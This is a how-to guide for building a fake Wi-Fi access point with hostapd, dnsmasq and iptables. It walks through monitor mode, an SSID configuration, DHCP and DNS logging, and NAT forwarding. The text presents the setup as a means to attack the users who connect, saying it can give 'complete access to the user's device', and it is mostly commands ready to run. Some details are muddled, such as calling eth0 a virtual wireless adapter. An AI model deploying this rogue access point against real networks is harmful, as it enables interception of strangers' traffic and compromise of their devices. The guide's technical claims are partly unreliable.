Fake Access Point
Installation
- apt update
- apt install hostapd dnsmasq
We need to put the wireless card in monitor mode to allow us to sniff the packets in and around the network. You can use this method:
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
Or if that didn’t work, you can use this method instead:
- airmon-ng start wlan0
- mkdir /root/fap
- cd /root/fap
Once we are in /root/fap that we created, we will now setup a new hostapd configuration file and write instructions inside. Hostapd (Host access point daemon) is a software access point that lets the user to use his/her wireless adapter to broadcast several access points at the same time.
nano hostapd.conf nano: is a command line text editor included in most Linux installations. hostapd.conf: is the name of the configuration file that we created. Now inside hostapd.conf, we need to setup instruction orders for it.
interface=wlan0mon driver=nl80211 ssid=[Name of the Wifi] hw_mode=g channel=[Channel number] macaddr_acl=0 ignore_broadcast_ssid=0 After writing these instructions, press CTRL+X, then Y, then ENTER. Now we are all set for hostapd.conf.
interface: The name of the wireless adapter that we are using in monitor mode. driver: The supported driver for hostapd. ssid: The broadcasted Wifi name. hw_mode=g : Simply instruct it to use 2.4GHz band. channel: The channel number to use for the fake access point. macaddr_acl=0: Tells hostapd to not use MAC filtering. [macaddr_acl=1] tells it to use MAC filtering. ignore_broadcast_ssid=0 : To make the fake access point visible and not hidden.
interface=wlan0mon
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
dhcp-range: IP address range for the connected network clients. 12h is the amount of hours until the lease expires.
dhcp-option=3: Gateway IP for the networks.
dhcp-option=6: For DNS Server followed by IP address
server: DNS server’s address
log-queries: Log the results of DNS queries handled by dnsmasq.
log-dhcp: Log all the options sent to DHCP clients and the tags used to determine them.
listen-address: Links the DHCP to the local IP address which is 127.0.0.1.
Now we need to assign the interface a network gateway and netmask and then add the routing table.
ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 Start the DNS server by doing:
dnsmasq -C dnsmasq.conf -d
STEP 8:
To provide the users with internet access, we need to forward traffic from eth0, the virtual wireless adapter that is connected to the internet, to wlan0mon. This will help you perform various attacks that can give you complete access to the user’s device. If you don’t want the users to have internet access, skip this step.
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan0mon -j ACCEPT First command: Interface name that is used to forward traffic from. Second command: Interface name to receive the packets or the interface that is being forwarded to. Now execute this command to enable IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward